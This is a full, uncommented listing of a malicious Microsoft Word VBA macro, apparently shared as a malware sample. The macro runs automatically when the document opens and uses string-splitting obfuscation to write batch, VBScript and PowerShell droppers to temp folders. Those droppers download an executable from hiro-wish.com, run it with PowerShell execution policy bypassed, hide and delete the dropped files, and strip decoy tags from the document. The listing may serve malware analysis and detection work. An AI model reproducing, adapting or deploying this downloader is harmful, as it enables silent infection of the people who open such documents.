Malicious Word macro

1. Attribute VB_Name = "ThisDocument"
2. Attribute VB_Base = "1Normal.ThisDocument"
3. Attribute VB_GlobalNameSpace = False
4. Attribute VB_Creatable = False
5. Attribute VB_PredeclaredId = True
6. Attribute VB_Exposed = True
7. Attribute VB_TemplateDerived = True
8. Attribute VB_Customizable = True
9. Sub Auto_Open()
10.     h
11. End Sub
12. Sub h()
13. Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR, XPFILEDIR
14.      USER = Environ("username")
15.      PST1 = "adobeacd-update.p" + Chr(115) + "1"
16.      BART = "adobeacd-update.b" + Chr(Asc("a")) + Chr(Asc("t"))
17.      ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl"
18.      VBT1 = "adobeacd-update." + Chr(118) + "bs"
19.      VBTXP = "adobeacd-updatexp.v" + Chr(Asc("b")) + "s"
20.      
21.  
22.      MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
23.      ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
24.      MY_FILEDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
25.      MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
26.      XPFILEDIR = "c:\Windows\Temp\" + VBTXP
27.      XPBARTFILEDIR = "c:\Windows\Temp\" + BART
28.      
29.       On Error Resume Next
30.      SetAttr MY_FILENDIR, vbNormal
31.      
32.      If (Len(Dir(MY_FILENDIR)) <> 0) Then
33.       Kill MY_FILENDIR
34.      End If
35.      
36.      On Error Resume Next
37.      SetAttr MY_FILEDIR, vbNormal
38.      If (Dir(MY_FILEDIR) <> "") Then
39.       Kill MY_FILEDIR
40.      End If
41.      
42.      On Error Resume Next
43.      SetAttr MY_FILDIR, vbNormal
44.      If (Dir(MY_FILDIR) <> "") Then
45.       Kill MY_FILDIR
46.      End If
47.      
48.      On Error Resume Next
49.      SetAttr XPFILEDIR, vbNormal
50.      If (Dir(XPFILEDIR) <> "") Then
51.       Kill XPFILEDIR
52.      End If
53.      
54.      Dim FileNumber As Integer
55.      Dim FileNumb As Integer
56.      Dim FileNu As Integer
57.      Dim mttt As Integer
58.      Dim retVal As Variant
59.      'Dim winver As Integer
60.     FileNumber = FreeFile
61.      FileNumb = FreeFile
62.      FileNu = FreeFile
63.      
64.      Dim objWMIService As Variant
65.     Dim colOperatingSystems As Variant
66.     Dim objOperatingSystem As Variant
67.     Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
68.     Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
69.     For Each objOperatingSystem In colOperatingSystems
70.         SysReport = SysReport & "The operating system on this computer is " & _
71.             objOperatingSystem.Caption & "  (" & objOperatingSystem.Version & ")"
72.     Next
73.      
74.      Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
75.      Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
76.      For Each objOperatingSystem In colOperatingSystems
77.         winverstr = objOperatingSystem.Version
78.     Next
79.    
80.    
81.     winver = Val(winverstr)
82.     WaitFor (1)
83.      
84. If (winver <= 5.5) Then
85.      Open XPBARTFILEDIR For Output As #FileNu
86.      Print #FileNu, "@echo off"
87.      Print #FileNu, "ping 1.1.2.2 -n 2"
88.      Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34)
89.      Print #FileNu, "ping 1.1.2.2 -n 2"
90.      Print #FileNu, "c:\Windows\Temp\444.exe"
91.      Print #FileNu, ":loop"
92.      Print #FileNu, "ping 1.1.2.2 -n 1"
93.      Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
94.      Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
95.      Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + " goto loop"
96.      Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + " goto loop"
97.      Print #FileNu, "exit"
98.      Close #FileNu
99.      WaitFor (2)
100.      mttt = 88
101.  
102.      Open XPFILEDIR For Output As #FileNumber
103.      Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://hiro-wish.com/js/bin" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
104.      Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
105.      
106.      Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
107.      Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"
108.      
109.      Print #FileNumber, "objXMLHTTP.send() "
110.      Print #FileNumber, "If objXMLHTTP.Status = 200 Then"
111.      
112.      Print #FileNumber, "Set objADOStream = CreateObject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") "
113.      
114.      Print #FileNumber, "objADOStream.Open "
115.      Print #FileNumber, "objADOStream.Type = 1"
116.      Print #FileNumber, "objADOStream.Write objXMLHTTP.ResponseBody "
117.      Print #FileNumber, "objADOStream.Position = 0 "
118.      Print #FileNumber, "objADOStream.SaveToFile strTecation "
119.      Print #FileNumber, "objADOStream.Close "
120.      Print #FileNumber, "Set objADOStream = Nothing "
121.      Print #FileNumber, "End if "
122.      Print #FileNumber, "Set objXMLHTTP = Nothing"
123.      Print #FileNumber, "Set objShell = CreateObject(" + Chr(34) + "WScript.Shell" + Chr(34) + ")"
124.      Close #FileNumber
125.      
126.      WaitFor (1)
127.      
128.      retVal = Shell(XPBARTFILEDIR, 0)
129.      
130.      
131. End If
132.      
133.      
134. If (winver > 5.5) Then
135.      Open MY_FILENDIR For Output As #FileNumber
136.      Print #FileNumber, "$hashroot = '94-4a-1e-86-99-69-dd-8a-4b-64-ca-5e-6e-bc-20-9a';"
137.      Print #FileNumber, "$hash = '0';"
138.      Print #FileNumber, "$down = N" & "ew" & "-" & Chr(79) & "bject " & Chr(Asc("S")) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
139.      Print #FileNumber, "$url  = '" + Chr(Asc("h")) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc("p")) + "://hiro-wish.com/js/bi" & "n.e" & "xe';"
140.      Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
141.      Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25';"
142.      Print #FileNumber, "$down" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
143.      Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
144.      Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
145.      Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + "';"
146.      Print #FileNumber, "$batFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART + "';"
147.      Print #FileNumber, "$psFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST1 + "';"
148.      Print #FileNumber, "Start-Sleep -s 15;"
149.      Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c  'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e';     "
150.      Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
151.      Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
152.      Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
153.      Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
154.      Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
155.      Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
156.      Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
157.      Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
158.      Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
159.      Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
160.      Close #FileNumber
161.    
162.     Open MY_FILDIR For Output As #FileNumb
163.     Print #FileNumb, "Dim dff"
164.     Print #FileNumb, "dff = 68"
165.     Print #FileNumb, "cur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
166.     Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & "S" & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
167.     Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST1 + Chr(34)
168.     Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
169.     Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
170.     Close #FileNumb
171.    
172.     Open MY_FILEDIR For Output As #FileNu
173.     Print #FileNu, "@echo off"
174.     Print #FileNu, "ping 1.1.2.2 -n 2"
175.     Print #FileNu, "chcp 1251"
176.     Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT1 + Chr(34)
177.     Print #FileNu, "exit"
178.     Close #FileNu
179.        
180.     SetAttr MY_FILENDIR, vbNormal
181.     SetAttr MY_FILEDIR, vbNormal
182.     SetAttr MY_FILDIR, vbNormal
183.      
184.     WaitFor (1)
185.    
186.     retVal = Shell(MY_FILEDIR, 0)
187. End If
188.      
189.      findTest
190.     secondTest
191.     For Each myStoryRange In ActiveDocument.StoryRanges
192.     With myStoryRange.Find
193.         .Text = "<" & "sel" & "ect>"
194.         .Replacement.Text = " "
195.         .Wrap = wdFindContinue
196.         .Execute Replace:=wdReplaceAll
197.     End With
198.     Next myStoryRange
199.  
200.     For Each myStoryRange In ActiveDocument.StoryRanges
201.     With myStoryRange.Find
202.         .Text = "</s" & "ele" & "ct>"
203.         .Replacement.Text = " "
204.         .Wrap = wdFindContinue
205.         .Execute Replace:=wdReplaceAll
206.     End With
207.     Next myStoryRange
208.    
209.     For Each myStoryRange In ActiveDocument.StoryRanges
210.     With myStoryRange.Find
211.         .Text = "<" & "in" & "box>"
212.         .Replacement.Text = " "
213.         .Wrap = wdFindContinue
214.         .Execute Replace:=wdReplaceAll
215.     End With
216.     Next myStoryRange
217.  
218.     For Each myStoryRange In ActiveDocument.StoryRanges
219.     With myStoryRange.Find
220.         .Text = "</" & "in" & "box>"
221.         .Replacement.Text = " "
222.         .Wrap = wdFindContinue
223.         .Execute Replace:=wdReplaceAll
224.     End With
225.     Next myStoryRange
226.      
227.  
228. End Sub
229. Sub WaitFor(NumOfSeconds As Long)
230. Dim SngSec As Long
231. SngSec = Timer + NumOfSeconds
232.  
233. Do While Timer < SngSec
234. DoEvents
235. Loop
236.  
237. End Sub
238.  
239. Sub AutoOpen()
240.     Auto_Open
241. End Sub
242. Sub Workbook_Open()
243.     Auto_Open
244. End Sub
245. Sub findTest()
246. Dim firstTerm As String
247. Dim secondTerm As String
248. Dim rrtt As Range
249. Dim selRange As Range
250. Dim selectedText As String
251.  
252. Set rrtt = ActiveDocument.Range
253. firstTerm = "<se" & "lect>"
254. secondTerm = "</sel" & "ect>"
255. ASKASAIEJ = "ask as8d j dnkjh12kh1 sad"
256. With rrtt.Find
257. .Text = firstTerm
258. .MatchWholeWord = True
259. .Execute
260. ASKUKKIEJ = "aasdlkasjdask as8d j dnkjh12kh1 sad"
261. rrtt.Collapse direction:=wdCollapseEnd
262. Set selRange = ActiveDocument.Range
263. selRange.Start = rrtt.End
264. .Text = secondTerm
265. .MatchWholeWord = True
266. .Execute
267. ASKSASADW = "asjldklas"
268. rrtt.Collapse direction:=wdCollapseStart
269. selRange.End = rrtt.Start
270. selectedText = selRange.Delete
271. End With
272. End Sub
273.  
274. Sub secondTest()
275. Dim firstTerm As String
276. Dim secondTerm As String
277. Dim myRanget As Range
278. Dim yytt As Range
279. Dim selRanget As Range
280. Dim selectedTextt As String
281.  
282. Set yytt = ActiveDocument.Range
283. firstTerm = "<in" & "box>"
284. secondTerm = "</in" & "box>"
285. ASKIEJSASAHBDJ = "ask as8d j asdasl;a skdjasdnkjh12kh1 sad"
286. With yytt.Find
287. .Text = firstTerm
288. .MatchWholeWord = True
289. .Execute
290. ASKIEJ = "ask as8d j dnkjh12kh1 sad"
291. yytt.Collapse direction:=wdCollapseEnd
292. ASKIEJSHBDJ = "askasda as8d j asdaasdassl;a skdjasdnkjh12kh1 sad"
293. Set selRanget = ActiveDocument.Range
294. selRanget.Start = yytt.End
295. .Text = secondTerm
296. .MatchWholeWord = True
297. .Execute
298. ASAKJSKIEJSHBDJ = "ask as8d j asdaasdasdassl;a skdjasdnkjh12kh1 sad"
299. yytt.Collapse direction:=wdCollapseStart
300. selRanget.End = yytt.Start
301. selectedTextt = selRanget
302. selRanget.Font.Color = wdColorBlack
303. End With
304. End Sub